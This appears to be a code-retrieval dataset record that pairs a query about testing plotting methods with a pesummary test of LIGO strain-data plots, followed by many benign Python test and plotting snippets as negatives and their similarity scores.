TimeSeries(key=TestAlphaVantage._API_KEY_TEST,\n output_format='pandas')\n url = \"https://www.alphavantage.co/query?function=BATCH_STOCK_QUOTES&symbols=MSFT,FB,AAPL&apikey=test\"\n path_file = self.get_file_from_url(url)\n with open(path_file) as f:\n mock_urlopen.return_value = f\n data, _ = ts.get_batch_stock_quotes(symbols=('MSFT', 'FB', 'AAPL'))\n self.assertIsInstance(\n data, df, 'Result Data must be a pandas dataframe')", "def test_data_source_soaps_change_stream_get(self):\n pass", "def fetch_fiber_display_report(start_date, end_date, \r\n fyber_display_publisher_id, \r\n fyber_display_consumer_key, \r\n fyber_display_consumer_secret):\r\n print(f\"Fetching Fyber Display data from {start_date} to {end_date}...\")\r\n start_date = datetime.datetime.fromisoformat(start_date)\r\n end_date = datetime.datetime.fromisoformat(end_date)\r\n \r\n #subtraction is for the time difference - MoPub and Fyber Video are on PST \r\n start_date_unixtime = int(time.mktime(start_date.timetuple()))-14400 \r\n end_date_unixtime = datetime.datetime.timestamp(end_date)\r\n url = 'https://console.inner-active.com/iamp/services/performance/publisher/{}/{}/{}'.format(fyber_display_publisher_id,start_date_unixtime, end_date_unixtime)\r\n headers = {\"Content-type\":\"application/json\",\"Accept\":\"application/json\"}\r\n auth = OAuth1(fyber_display_consumer_key, fyber_display_consumer_secret) \r\n r = requests.get(url, auth=auth, headers=headers)\r\n data = json.loads(r.text)\r\n dataframe = pd.DataFrame(data)\r\n return dataframe" ]
[ "0.73446274", "0.65186745", "0.6414948", "0.6280164", "0.61943877", "0.6105646", "0.5987783", "0.596136", "0.5908009", "0.5907794", "0.59036356", "0.5877466", "0.5877377", "0.5873337", "0.5770271", "0.57309335", "0.57286495", "0.5710138", "0.569773", "0.56320137", "0.5627794", "0.5566823", "0.55614346", "0.55172527", "0.55113566", "0.54898965", "0.5482834", "0.54818475", "0.54653126", "0.5457008", "0.54402673", "0.5403126", "0.53940356", "0.5390514", "0.5388878", "0.5366225", "0.5358595", "0.5342994", "0.5324872", "0.53174347", "0.53170943", "0.5309232", "0.53043914", "0.5300218", "0.528886", "0.52876884", "0.5286138", "0.52849746", "0.5284072", "0.5282268", "0.528089", "0.5278852", "0.52786773", "0.52741206", "0.52694714", "0.5267141", "0.5262917", "0.5262392", "0.5253481", "0.5246118", "0.524433", "0.52433336", "0.5241528", "0.5234293", "0.52334523", "0.5218858", "0.5215905", "0.5214547", "0.5212053", "0.5209077", "0.5208296", "0.5204501", "0.5201517", "0.51993", "0.51960015", "0.5194014", "0.51864815", "0.51783097", "0.5178214", "0.5175748", "0.51742774", "0.51732177", "0.51731944", "0.516773", "0.51636076", "0.51583815", "0.5155783", "0.51501983", "0.5147394", "0.5144577", "0.5144464", "0.5142807", "0.5129394", "0.5128012", "0.51254845", "0.51238894", "0.51224065", "0.51186556", "0.5107196", "0.51026374" ]
0.81294215
0
Test that the gwpy methods are still the same
def test_fetch_open_data(self): args = ["L1", 1126259446, 1126259478] pesummary_data = StrainData.fetch_open_data(*args) gwpy_data = TimeSeries.fetch_open_data(*args) np.testing.assert_almost_equal(pesummary_data.value, gwpy_data.value) np.testing.assert_almost_equal( pesummary_data.times.value, gwpy_data.times.value ) assert isinstance(pesummary_data.gwpy, TimeSeries) np.testing.assert_almost_equal( pesummary_data.gwpy.value, gwpy_data.value ) np.testing.assert_almost_equal( pesummary_data.gwpy.times.value, gwpy_data.times.value ) assert pesummary_data.IFO == "L1" assert list(pesummary_data.strain_dict.keys()) == ["L1"] np.testing.assert_almost_equal( pesummary_data.strain_dict["L1"].value, gwpy_data.value ) np.testing.assert_almost_equal( pesummary_data.strain_dict["L1"].times.value, gwpy_data.times.value )
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_method(self):\n self.assertEqual(self.method, 'modified strong collision')", "def test_required_methods(self):", "def test_identical(self):\n write this test!", "def test_class_ne_method(self, test_instances):\n a, b, c = test_instances\n\n assert a != c\n assert b != c\n\n a.__dict__.update(baz=True)\n\n assert a != b", "def test_patch_none():", "def test_instance_method() -> None:\n assert inspect.signature(lmp.tknzr._bpe.BPETknzr.__init__) == Signature(\n parameters=[\n Parameter(\n annotation=Parameter.empty,\n default=Parameter.empty,\n kind=Parameter.POSITIONAL_OR_KEYWORD,\n name='self',\n ),\n Parameter(\n annotation=bool,\n default=False,\n kind=Parameter.KEYWORD_ONLY,\n name='is_uncased',\n ),\n Parameter(\n annotation=int,\n default=-1,\n kind=Parameter.KEYWORD_ONLY,\n name='max_vocab',\n ),\n Parameter(\n annotation=int,\n default=0,\n kind=Parameter.KEYWORD_ONLY,\n name='min_count',\n ),\n Parameter(\n annotation=int,\n default=10000,\n kind=Parameter.KEYWORD_ONLY,\n name='n_merge',\n ),\n Parameter(\n annotation=Any,\n default=Parameter.empty,\n kind=Parameter.VAR_KEYWORD,\n name='kwargs',\n ),\n ],\n return_annotation=Signature.empty,\n )\n\n assert inspect.signature(lmp.tknzr._bpe.BPETknzr.build_vocab) == inspect.signature(BaseTknzr.build_vocab)\n assert lmp.tknzr._bpe.BPETknzr.build_vocab != BaseTknzr.build_vocab\n\n assert inspect.signature(lmp.tknzr._bpe.BPETknzr.dtknz) == inspect.signature(BaseTknzr.dtknz)\n assert lmp.tknzr._bpe.BPETknzr.dtknz != BaseTknzr.dtknz\n\n assert inspect.signature(lmp.tknzr._bpe.BPETknzr.tknz) == inspect.signature(BaseTknzr.tknz)\n assert lmp.tknzr._bpe.BPETknzr.tknz != BaseTknzr.tknz", "def test_inherent_instance_method() -> None:\n assert lmp.tknzr._bpe.BPETknzr.dec == BaseTknzr.dec\n assert lmp.tknzr._bpe.BPETknzr.enc == BaseTknzr.enc\n assert lmp.tknzr._bpe.BPETknzr.norm == BaseTknzr.norm\n assert lmp.tknzr._bpe.BPETknzr.pad_to_max == BaseTknzr.pad_to_max\n assert lmp.tknzr._bpe.BPETknzr.vocab_size == BaseTknzr.vocab_size", "def mockup(cls):\n pass", "def test_new_method_appendded():\n expected = True\n actual = \"breadth_first\" in dir(Graph)\n assert expected ==actual", "def test_class_method() -> None:\n assert inspect.signature(lmp.tknzr._bpe.BPETknzr.add_CLI_args) == inspect.signature(BaseTknzr.add_CLI_args)", "def test_stub(self):\n pass", "def test_regular_method(self):\n self.assertIdentical(self.wrapper.close.im_func,\n self.client.close.im_func)", "def test__foo__MethodsWorkWithSyntacticalFormAndMethodCallInterchangably(self):\n\t\tc = Controller()\n\t\tx = c.mock(KlassBeingMocked)\n\t\tx.g.__getitem__(5)\n\t\tc.setReturn(6)\n\t\tx.h.__getitem__(7)\n\t\tc.setReturn(8)\n\t\tc.replay()\n\t\tself.failUnless(x.g[5] == 6)\n\t\tself.failUnless(x.h.__getitem__(7) == 8)", "def test_blow_up(self):\n self.assertTrue(self.g.__class__)", "def _test(self):", "def _test(self):", "def _test(self):", "def _test(self):", "def _test(self):", "def test_class_eq_method(self, test_instances):\n a, b, _ = test_instances\n\n assert a == b", "def test_uparforvarg(self):", "def test_010(self):\n caller = self.get_caller([SingleMethod])\n self.assertEqual(\"I have very little to say.\", caller())", "def testBeliefs1sk(self):", "def test_bound_methods_hash():\r\n a = Klass()\r\n b = Klass()\r\n nose.tools.assert_equal(hash(filter_args(a.f, [], (1, ))),\r\n hash(filter_args(b.f, [], (1, ))))", "def test_shared_method(self):\r\n\r\n m1=Module()\r\n m1.x=T.dscalar()\r\n x=T.dscalar()\r\n fy=Method(x,x*2)\r\n fz=Method([],m1.x*2)\r\n m1.y=fy\r\n m1.z=fz\r\n m1.ly=[fy]\r\n m1.lz=[fz]\r\n m1.lly=[[fy]]\r\n m1.llz=[[fz]]\r\n m1.ty=(fy,)\r\n m1.tz=(fz,)\r\n m1.tty=((fy,),)\r\n m1.ttz=((fz,),)\r\n m1.dy={'y':fy}\r\n m1.dz={'z':fz}\r\n\r\n inst=m1.make()\r\n inst.x=1\r\n assert inst.y(2)==4\r\n assert inst.z()==2\r\n assert inst.ly[0](2)==4\r\n assert inst.lz[0]()==2\r\n assert inst.ty[0](2)==4\r\n assert inst.tz[0]()==2\r\n assert inst.dy['y'](2)==4\r\n assert inst.dz['z']()==2\r\n assert inst.lly[0][0](2)==4\r\n assert inst.llz[0][0]()==2\r\n assert inst.tty[0][0](2)==4\r\n assert inst.ttz[0][0]()==2\r\n assert isinstance(inst.z,theano.compile.function_module.Function)\r\n assert isinstance(inst.lz[0],theano.compile.function_module.Function)\r\n assert isinstance(inst.llz[0][0],theano.compile.function_module.Function)\r\n assert isinstance(inst.tz[0],theano.compile.function_module.Function)\r\n assert isinstance(inst.dz['z'],theano.compile.function_module.Function)\r\n assert isinstance(inst.ttz[0][0],theano.compile.function_module.Function)\r\n assert isinstance(inst.y,theano.compile.function_module.Function)\r\n assert isinstance(inst.ly[0],theano.compile.function_module.Function)\r\n assert isinstance(inst.lly[0][0],theano.compile.function_module.Function)\r\n assert isinstance(inst.ty[0],theano.compile.function_module.Function)\r\n assert isinstance(inst.dy['y'],theano.compile.function_module.Function)\r\n assert isinstance(inst.tty[0][0],theano.compile.function_module.Function)\r\n\r\n\r\n assert m1.y is m1.ly[0]\r\n assert inst.y is inst.ly[0]\r\n assert inst.y is inst.lly[0][0]\r\n assert inst.y is inst.ty[0]\r\n assert inst.y is inst.tty[0][0]\r\n assert inst.y is inst.dy['y']", "def test_method_appending():\n expected = True\n actual = \"getEdge\" in dir(Graph)\n assert expected ==actual", "def test_recheck_fails(self):\n raise NotImplementedError", "def test_expected_qtest_proxies(qtbot, expected_method):\n assert hasattr(qtbot, expected_method)\n assert getattr(qtbot, expected_method).__name__ == expected_method", "def test_4_4_1_1(self):\n pass", "def testEquality(self):\n pass", "def test_call(self):\r\n x = self.FWP({'x': 3})\r\n self.assertEqual(x(), 3)", "def test_bound_methods():\r\n a = Klass()\r\n b = Klass()\r\n nose.tools.assert_not_equal(filter_args(a.f, [], (1, )),\r\n filter_args(b.f, [], (1, )))", "def test_b(self):\n v1 = versions.Version(version='1.2.3', name='foo')\n v2 = versions.Version(version='1.2', name='bar')\n\n self.assertTrue(v1 != v2)\n self.assertTrue(v2 != v1)", "def test_compare(self):", "def test_update(self):\n # this is tested graphically, as it is UI\n pass", "def test_static_methods():\n my_method = SGMethod(\"Test\")\n assert False == my_method.is_static\n \n my_method.is_static = True\n assert my_method.is_static", "def testProtocolReturn(self):\n self.assertEqual(\n self.protocol,\n self.mr.protocol\n )\n\n self.mr._protocol = 'burp'\n\n self.assertEqual(\n 'burp',\n self.mr.protocol\n )", "def test_method(self, test, another_test, _): # noqa: D213, D407", "def test_same_method_name_different_class(self):\n self.apple.take_then_give_back(self.cherry)\n apple_take_give_back_cherry_key = get_function_cache_key('method', 'tests.Fruit.take_then_give_back',\n (self.apple, self.cherry), {})\n self.assertExpectedKeyInCache(apple_take_give_back_cherry_key)\n\n self.celery.take_then_give_back(self.cherry)\n celery_take_give_back_cherry_key = get_function_cache_key('method', 'tests.Vegetable.take_then_give_back',\n (self.celery, self.cherry), {})\n self.assertExpectedKeyInCache(celery_take_give_back_cherry_key)\n\n self.assertNotEqual(apple_take_give_back_cherry_key, celery_take_give_back_cherry_key)", "def test_update9(self):\n pass", "def test_update_goal(self):\n pass", "def test_method(self):", "def test_instance_method():\n assert hasattr(ResRNNBlock, '__init__')\n assert inspect.signature(ResRNNBlock.__init__) == Signature(\n parameters=[\n Parameter(\n name='self',\n kind=Parameter.POSITIONAL_OR_KEYWORD,\n default=Parameter.empty,\n ),\n Parameter(\n name='d_hid',\n kind=Parameter.KEYWORD_ONLY,\n annotation=int,\n default=Parameter.empty,\n ),\n Parameter(\n name='n_hid_lyr',\n kind=Parameter.KEYWORD_ONLY,\n annotation=int,\n default=Parameter.empty,\n ),\n Parameter(\n name='p_hid',\n kind=Parameter.KEYWORD_ONLY,\n annotation=float,\n default=Parameter.empty,\n ),\n Parameter(\n name='kwargs',\n kind=Parameter.VAR_KEYWORD,\n annotation=Optional[Dict],\n ),\n ],\n return_annotation=Signature.empty,\n )\n\n assert hasattr(ResRNNBlock, 'forward')\n assert inspect.signature(ResRNNBlock.forward) == Signature(\n parameters=[\n Parameter(\n name='self',\n kind=Parameter.POSITIONAL_OR_KEYWORD,\n default=Parameter.empty,\n ),\n Parameter(\n name='batch_tk_reps',\n kind=Parameter.POSITIONAL_OR_KEYWORD,\n annotation=torch.Tensor,\n default=Parameter.empty,\n ),\n ],\n return_annotation=torch.Tensor,\n )\n\n assert hasattr(ResRNNModel, '__init__')\n assert inspect.signature(ResRNNModel.__init__) == Signature(\n parameters=[\n Parameter(\n name='self',\n kind=Parameter.POSITIONAL_OR_KEYWORD,\n default=Parameter.empty,\n ),\n Parameter(\n name='d_emb',\n kind=Parameter.KEYWORD_ONLY,\n annotation=int,\n default=Parameter.empty,\n ),\n Parameter(\n name='d_hid',\n kind=Parameter.KEYWORD_ONLY,\n annotation=int,\n default=Parameter.empty,\n ),\n Parameter(\n name='n_hid_lyr',\n kind=Parameter.KEYWORD_ONLY,\n annotation=int,\n default=Parameter.empty,\n ),\n Parameter(\n name='n_post_hid_lyr',\n kind=Parameter.KEYWORD_ONLY,\n annotation=int,\n default=Parameter.empty,\n ),\n Parameter(\n name='n_pre_hid_lyr',\n kind=Parameter.KEYWORD_ONLY,\n annotation=int,\n default=Parameter.empty,\n ),\n Parameter(\n name='p_emb',\n kind=Parameter.KEYWORD_ONLY,\n annotation=float,\n default=Parameter.empty,\n ),\n Parameter(\n name='p_hid',\n kind=Parameter.KEYWORD_ONLY,\n annotation=float,\n default=Parameter.empty,\n ),\n Parameter(\n name='tknzr',\n kind=Parameter.KEYWORD_ONLY,\n annotation=BaseTknzr,\n default=Parameter.empty,\n ),\n Parameter(\n name='kwargs',\n kind=Parameter.VAR_KEYWORD,\n annotation=Optional[Dict],\n ),\n ],\n return_annotation=Signature.empty,\n )", "def test_turtle(self):\n assert not inspection.is_fixture_method(DummyTestCase.turtle_method)", "def test_py_closure(self):", "def stub_out(self, old, new):\n self.useFixture(fixtures.MonkeyPatch(old, new))", "def stub_out(self, old, new):\n self.useFixture(fixtures.MonkeyPatch(old, new))", "def test_update_case(self):\n pass", "def test_update_state2(self):\n pass", "def test_instance_method(self):\n self.assertEqual(self.Test.update_attributes.im_class, self.Test)", "def test_cl_fix():\n assert Cl is BaseCl", "def test_ledger_apis(self):\n assert self.ledger_state_proxy.ledger_apis == self.ledger_apis, \"Must be equal.\"", "def test_b(self):\n v1 = versions.Version(version='1.2.3', name='foo')\n v2 = versions.Version(version='1.2', name='bar')\n\n self.assertFalse(v1 == v2)\n self.assertFalse(v2 == v1)", "def test_update(self):\n pass", "def test_update(self):\n pass", "def test_update(self):\n pass", "def test_let(self):", "def verify(self):", "def test_empty_functions():", "def test(self):\n raise NotImplementedError", "def assert_wrappers_equal(first, second):\n assert first.sk_params == second.sk_params\n assert first.history_ == second.history_\n if not first.model_ or not second.model_:\n assert first.model_ == second.model_\n else:\n assert_models_equal(first.model, second.model)", "def test_instance_method(self):\n self.assertEqual(self.Test.delete.im_class, self.Test)", "def test_basic_method_call_wrapper():\n my_method = SGMethod(\"test\")\n other_method = SGMethod(\"other\")\n \n my_method.calls(other_method)\n my_method.check_call_validity();\n \n assert other_method == my_method.method_called\n assert len(my_method.args) == 0", "def test_update_state4(self):\n pass", "def test_untar(self):", "def test_a(self):\n v1 = versions.Version(version='1.2.3', name='foo')\n v2 = versions.Version(version='2.2.3', name='bar')\n\n self.assertTrue(v1 != v2)\n self.assertTrue(v2 != v1)", "def test(self):", "def test(self):", "def test_theft_and_stealing(self):", "def test_method_creation():\n my_method = SGMethod(\"Test\")\n \n assert my_method.name == \"Test\"\n assert len(my_method.params) == 0\n assert my_method.return_type == None", "def test_class_method(self):\n self.assertEqual(self.Test.unscoped.im_self.__name__, 'Test')", "def test_4(self):\n params_spec, options_spec = generate_random_model()\n respy_obj = RespyCls(params_spec, options_spec)\n\n # Ensure that backward induction routines use the same grid for the\n # interpolation.\n write_interpolation_grid(respy_obj)\n\n # Extract class attributes\n (\n num_periods,\n edu_spec,\n optim_paras,\n num_draws_emax,\n seed_emax,\n is_debug,\n is_interpolated,\n num_points_interp,\n optimizer_options,\n file_sim,\n num_types,\n ) = dist_class_attributes(\n respy_obj,\n \"num_periods\",\n \"edu_spec\",\n \"optim_paras\",\n \"num_draws_emax\",\n \"seed_emax\",\n \"is_debug\",\n \"is_interpolated\",\n \"num_points_interp\",\n \"optimizer_options\",\n \"file_sim\",\n \"num_types\",\n )\n\n shocks_cholesky = optim_paras[\"shocks_cholesky\"]\n coeffs_common = optim_paras[\"coeffs_common\"]\n coeffs_home = optim_paras[\"coeffs_home\"]\n coeffs_edu = optim_paras[\"coeffs_edu\"]\n coeffs_a = optim_paras[\"coeffs_a\"]\n coeffs_b = optim_paras[\"coeffs_b\"]\n delta = optim_paras[\"delta\"]\n\n type_spec_shifts = optim_paras[\"type_shifts\"]\n type_spec_shares = optim_paras[\"type_shares\"]\n\n min_idx = edu_spec[\"max\"] + 1\n\n # Check the state space creation.\n state_space = StateSpace(\n num_periods, num_types, edu_spec[\"start\"], edu_spec[\"max\"], optim_paras\n )\n\n states_all, mapping_state_idx, _, _ = state_space._get_fortran_counterparts()\n\n pyth = (\n states_all,\n state_space.states_per_period,\n mapping_state_idx,\n state_space.states_per_period.max(),\n )\n\n f2py = fort_debug.wrapper_create_state_space(\n num_periods, num_types, edu_spec[\"start\"], edu_spec[\"max\"], min_idx\n )\n for i in range(4):\n # Slice Fortran output to shape of Python output.\n if isinstance(f2py[i], np.ndarray):\n f2py_reduced = f2py[i][tuple(map(slice, pyth[i].shape))]\n else:\n f2py_reduced = f2py[i]\n\n assert_allclose(pyth[i], f2py_reduced)\n\n _, _, pyth, _ = state_space._get_fortran_counterparts()\n\n f2py = fort_debug.wrapper_calculate_rewards_systematic(\n num_periods,\n state_space.states_per_period,\n states_all,\n state_space.states_per_period.max(),\n coeffs_common,\n coeffs_a,\n coeffs_b,\n coeffs_edu,\n coeffs_home,\n type_spec_shares,\n type_spec_shifts,\n )\n\n assert_allclose(pyth, f2py)\n\n # Carry some results from the systematic rewards calculation for future use and\n # create the required set of disturbances.\n periods_draws_emax = create_draws(\n num_periods, num_draws_emax, seed_emax, is_debug\n )\n\n # Save result for next test.\n periods_rewards_systematic = pyth.copy()\n\n # Fix for hardcoded myopic agents.\n optim_paras[\"delta\"] = 0.00000000000000001\n\n # Check backward induction procedure.\n state_space = pyth_backward_induction(\n periods_draws_emax,\n state_space,\n is_debug,\n is_interpolated,\n num_points_interp,\n optim_paras,\n file_sim,\n False,\n )\n _, _, _, pyth = state_space._get_fortran_counterparts()\n\n f2py = fort_debug.wrapper_backward_induction(\n num_periods,\n False,\n state_space.states_per_period.max(),\n periods_draws_emax,\n num_draws_emax,\n state_space.states_per_period,\n periods_rewards_systematic,\n mapping_state_idx,\n states_all,\n is_debug,\n is_interpolated,\n num_points_interp,\n edu_spec[\"start\"],\n edu_spec[\"max\"],\n shocks_cholesky,\n delta,\n coeffs_common,\n coeffs_a,\n coeffs_b,\n file_sim,\n False,\n )\n\n assert_allclose(pyth, f2py)", "def test_should_implement(self):\n pass", "def test_nothing(self):", "def test_eq(self):\n self.assertEqual(self.gmail_case, self.gmail_case_from_init)", "def unitary_test():", "def test_equal_basic(self):\n utils.compare_tracing_methods(\n SimpleCompareOpsModule(\"equal\"),\n torch.randn(3, 4, 5),\n torch.randn(3, 4, 5),\n fusible_ops={\"aten::eq\"},\n )", "def test_same_models(self):\n\t\t\n\t\t# TODO: finish\n\t\tpass", "def test_ne():\n # Define some universal gsps\n gsp = galsim.GSParams(maxk_threshold=1.1e-3, folding_threshold=5.1e-3)\n\n # Pixel. Params include scale, flux, gsparams.\n # gsparams.\n # The following should all test unequal:\n gals = [galsim.Pixel(scale=1.0),\n galsim.Pixel(scale=1.1),\n galsim.Pixel(scale=1.0, flux=1.1),\n galsim.Pixel(scale=1.0, gsparams=gsp)]\n all_obj_diff(gals)\n\n # Box. Params include width, height, flux, gsparams.\n # gsparams.\n # The following should all test unequal:\n gals = [galsim.Box(width=1.0, height=1.0),\n galsim.Box(width=1.1, height=1.0),\n galsim.Box(width=1.0, height=1.1),\n galsim.Box(width=1.0, height=1.0, flux=1.1),\n galsim.Box(width=1.0, height=1.0, gsparams=gsp)]\n all_obj_diff(gals)\n\n # TopHat. Params include radius, flux, gsparams.\n # gsparams.\n # The following should all test unequal:\n gals = [galsim.TopHat(radius=1.0),\n galsim.TopHat(radius=1.1),\n galsim.TopHat(radius=1.0, flux=1.1),\n galsim.TopHat(radius=1.0, gsparams=gsp)]\n all_obj_diff(gals)", "def test_multiple_rng_aliasing():\r\n rng1 = MRG_RandomStreams(1234)\r\n rng2 = MRG_RandomStreams(2392)\r\n assert rng1.state_updates is not rng2.state_updates", "def test_class_method(self):\n self.assertEqual(pyperry.Base.adapter.im_self.__name__, 'Base')", "def test_call_interface_twice(self, monkeypatch, data):\n monkeypatch.delenv(\"ORION_RESULTS_PATH\", raising=False)\n reloaded_client = reload(cli)\n\n reloaded_client.report_results(data)\n with pytest.raises(RuntimeWarning) as exc:\n reloaded_client.report_results(data)\n\n assert \"already reported\" in str(exc.value)\n assert reloaded_client.IS_ORION_ON is False\n assert reloaded_client.RESULTS_FILENAME is None\n assert reloaded_client._HAS_REPORTED_RESULTS is True", "def test_class_methods(self):\n\n x = BaseTransformer()\n\n h.test_object_method(obj=x, expected_method=\"fit\", msg=\"fit\")\n\n h.test_object_method(obj=x, expected_method=\"transform\", msg=\"transform\")\n\n h.test_object_method(\n obj=x, expected_method=\"columns_set_or_check\", msg=\"columns_set_or_check\"\n )\n\n h.test_object_method(\n obj=x, expected_method=\"columns_check\", msg=\"columns_check\"\n )", "def testOverrideOfTwoItems(self):\n\t\tc = Controller()\n\t\tx = KlassBeingMocked()\n\t\ty = KlassBeingMocked()\n\t\tx.f = 38\n\t\ty.g = 39\n\t\tc.override(x, 'f', 5)\n\t\tc.override(y, 'g', 6)\n\t\tself.failUnless(x.f == 5)\n\t\tself.failUnless(y.g == 6)\n\t\tc.restore()\n\t\tself.failUnless(x.f == 38)\n\t\tself.failUnless(y.g == 39)", "def testConsistency(self):", "def _test(self):\n pass", "def _test(self):\n pass", "def _test(self):\n pass", "def test(self):\n pass", "def test_c(self):\n v1 = versions.Version(version='1.2.3', name='foo')\n v2 = versions.Version(version='1.2.3', name='bar')\n\n self.assertFalse(v1 != v2)\n self.assertFalse(v2 != v1)", "def test_same_static_method_name_different_class_instance_reference(self):\n self.apple.static_method(self.cherry)\n apple_static_method_key = get_function_cache_key('function', 'tests.Fruit.static_method', (self.cherry,), {})\n self.assertExpectedKeyInCache(apple_static_method_key)\n\n self.celery.static_method(self.cherry)\n celery_static_method_key = get_function_cache_key('function', 'tests.Vegetable.static_method', (self.cherry,),\n {})\n self.assertExpectedKeyInCache(celery_static_method_key)\n\n self.assertNotEqual(apple_static_method_key, celery_static_method_key)", "def test_update_no_args(self):\n Base._Base__nb_objects = 0\n s = Square(1, 0, 0, 1)\n s.update()\n self.assertEqual(str(s), \"[Square] (1) 0/0 - 1\")", "def __eq__(self, *args): #cannot find CLR method\r\n pass", "def __eq__(self, *args): #cannot find CLR method\r\n pass", "def __eq__(self, *args): #cannot find CLR method\r\n pass", "def __eq__(self, *args): #cannot find CLR method\r\n pass", "def __eq__(self, *args): #cannot find CLR method\r\n pass", "def __eq__(self, *args): #cannot find CLR method\r\n pass", "def __eq__(self, *args): #cannot find CLR method\r\n pass", "def __eq__(self, *args): #cannot find CLR method\r\n pass", "def __eq__(self, *args): #cannot find CLR method\r\n pass" ]
[ "0.68101746", "0.6541694", "0.65237844", "0.65063614", "0.6301085", "0.62971485", "0.61756206", "0.61576486", "0.6139045", "0.6088883", "0.6029623", "0.602739", "0.6020766", "0.60056776", "0.5970609", "0.5970609", "0.5970609", "0.5970609", "0.5970609", "0.5945786", "0.5943556", "0.5927632", "0.5893446", "0.5884779", "0.5863099", "0.58585036", "0.58582294", "0.58557373", "0.585177", "0.5846566", "0.58144027", "0.580986", "0.58038926", "0.5799261", "0.57687676", "0.5767392", "0.574993", "0.573741", "0.5712727", "0.570028", "0.5699727", "0.56965315", "0.5694435", "0.5679296", "0.5676317", "0.5672133", "0.5672133", "0.5670074", "0.56693673", "0.5668017", "0.56604856", "0.5652901", "0.56517416", "0.56457293", "0.56457293", "0.56457293", "0.5640788", "0.5614568", "0.5611866", "0.56064886", "0.56011695", "0.55968684", "0.559323", "0.55918676", "0.5586408", "0.5569257", "0.55465376", "0.55465376", "0.55441725", "0.5543793", "0.55412436", "0.553968", "0.55376756", "0.55281115", "0.5528109", "0.5526921", "0.55186224", "0.5509099", "0.5503336", "0.55026484", "0.5502545", "0.55020994", "0.55003405", "0.5498964", "0.54979086", "0.549666", "0.549666", "0.549666", "0.5495543", "0.5495075", "0.5495023", "0.549346", "0.5492685", "0.5492685", "0.5492685", "0.5492685", "0.5492685", "0.5492685", "0.5492685", "0.5492685", "0.5492685" ]
0.0
-1
Test that the plotting methods work as expected
def test_plots(self): args = ["L1", 1126259446, 1126259478] pesummary_data = StrainData.fetch_open_data(*args) fig = pesummary_data.plot(type="td") assert isinstance(fig, matplotlib.figure.Figure) fig = pesummary_data.plot(type="fd") assert isinstance(fig, matplotlib.figure.Figure) fig = pesummary_data.plot(1126259446 + 20., type="omegascan") assert isinstance(fig, matplotlib.figure.Figure) fig = pesummary_data.plot(type="spectrogram") assert isinstance(fig, matplotlib.figure.Figure)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_plotting():\n specs = _read_schrodinger('tests/test_data/{}.inp'.format(PROBLEM))\n xint, yint = _interpolate(specs['interpolxydecs'][:, 0],\n specs['interpolxydecs'][:, 1], specs['xopt'])\n\n energies = np.loadtxt('tests/test_data/energies_{}.ref'.format(PROBLEM))\n wfuncsdata = np.loadtxt('tests/test_data/wfuncs_{}.ref'.format(PROBLEM))\n potdata = np.vstack((xint, yint)).T\n\n expval = calculate_expval(xint, wfuncsdata[:, 1:].T)\n uncval = calculate_uncertainty(xint, wfuncsdata[:, 1:].T)\n\n expvaldata = np.vstack((expval, uncval)).T\n _write_data('tests/test_data', potdata, energies, wfuncsdata, expvaldata)\n\n # qm_plottings('tests/test_data', scale=0.5)\n # assert True", "def test_no_arguments(self):\n fig = plt.figure()\n ax = fig.add_subplot(projection='ternary')\n lines = ax.plot()\n assert lines == []", "def plot():\n pass", "def test_plotting():\n out_dir = _TempDir()\n fname, behf, corrupted = make_raw(out_dir)\n raw = _read_raw(fname, preload=True)\n pd = raw._data[0]\n candidates = _find_pd_candidates(\n pd, max_len=max_len, baseline=baseline,\n zscore=zscore, max_flip_i=max_flip_i, sfreq=raw.info['sfreq'])[0]\n beh = _read_tsv(behf)\n beh_events = np.array(beh['fix_onset_time']) * raw.info['sfreq']\n beh_events_adjusted, alignment, events = _find_best_alignment(\n beh_events, candidates, exclude_shift, resync, raw.info['sfreq'],\n verbose=False)\n errors = beh_events_adjusted - events + alignment\n _plot_trial_errors(beh_events_adjusted, alignment, events,\n errors, exclude_shift, raw.info['sfreq'])\n errors[abs(errors) / raw.info['sfreq'] > 2 * exclude_shift] = np.nan\n np.testing.assert_array_almost_equal(\n plt.gca().lines[0].get_ydata(), errors)\n section_data = [(0, 'test', np.random.random(10))]\n _plot_excluded_events(section_data, 2)\n assert plt.gca().title.get_text() == 'test'\n np.testing.assert_array_equal(plt.gca().lines[0].get_ydata(),\n section_data[0][2])", "def test_make_plot_custom(self):\n print(sys._getframe().f_code.co_name)\n try:\n x = np.arange(0,6)*300000\n y = np.arange(0,6)\n pp.make_plot(x,y,plot_type='c',plot_title='test',ylabel='test',xlabel='test',xticks=[0,2,4,6],yticks=[0,2,4,6])\n except Exception as e:\n raise\n plt.close('all')", "def plot_test(func):\n\n @wraps(func)\n def wrapper(*args, **kwargs):\n\n plt.close('all')\n\n func(*args, **kwargs)\n\n ax = plt.gca()\n assert ax.has_data()\n\n return wrapper", "def test_execution(self):\n self.result = self.plot(tree=self.tree, feature_table=self.table,\n sample_metadata=self.md,\n feature_metadata=self.fmd)\n self.assertIsInstance(self.result, Results)\n self.assertIsInstance(self.result.visualization, Visualization)\n # TODO check details of viz more carefully (likely by digging into the\n # index HTML of self.result.visualization, etc.)", "def test_point_plot(self):\n clf()\n filename = 'points_plot.png'\n N = 10\n points = GeoSeries(Point(i, i) for i in xrange(N))\n ax = points.plot()\n self._compare_images(ax=ax, filename=filename)", "def test_plot_ess(models, kind, kwargs):\n idata = models.model_1\n ax = plot_ess(idata, kind=kind, **kwargs)\n assert np.all(ax)", "def test_make_plot_ur(self):\n print(sys._getframe().f_code.co_name)\n try:\n x = np.arange(0,6)*300000\n y = np.arange(0,6)\n pp.make_plot(x,y,plot_type='ur')\n except Exception as e:\n raise\n plt.close('all')", "def plot(self):\n pass", "def test_poly_plot(self):\n clf()\n filename = 'poly_plot.png'\n t1 = Polygon([(0, 0), (1, 0), (1, 1)])\n t2 = Polygon([(1, 0), (2, 0), (2, 1)])\n polys = GeoSeries([t1, t2])\n ax = polys.plot()\n self._compare_images(ax=ax, filename=filename)", "def test_data_with_five_arguments():\n fig = plt.figure()\n ax = fig.add_subplot(projection='ternary')\n tn0, tn1, tn2 = get_spiral()\n data = {'tn0': tn0, 'tn1': tn1, 'tn2': tn2}\n with pytest.raises(ValueError):\n ax.plot('tn0', 'tn1', 'tn2', 'foo', 'bar', data=data)", "def testPlots(self):\n\t\tself.watcher.analyze(layers=[67], plot=True, randomize=True)", "def test_plot_error(self, script_runner: ScriptRunner, tmp_path: Path) -> None:\n outfile = 